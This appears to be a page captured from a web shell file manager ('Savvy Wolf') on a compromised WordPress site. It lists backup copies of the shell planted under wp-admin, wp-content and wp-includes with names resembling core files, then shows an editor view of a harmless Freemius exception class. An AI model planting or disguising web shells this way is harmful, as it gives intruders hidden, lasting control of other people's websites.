Backups Created:
/home/teltatz/public_html/wp-admin/admin-wolf.php
/home/teltatz/public_html/wp-content/edit-wolf.php
/home/teltatz/public_html/wp-includes/widgets/class-wp-wolf-widget.php
Savvy
W
olf -
MANAGER
Edit File: EmptyArgumentException.php
<?php if ( ! defined( 'ABSPATH' ) ) { exit; } if ( ! class_exists( 'Freemius_InvalidArgumentException' ) ) { exit; } if ( ! class_exists( 'Freemius_EmptyArgumentException' ) ) { class Freemius_EmptyArgumentException extends Freemius_InvalidArgumentException { } }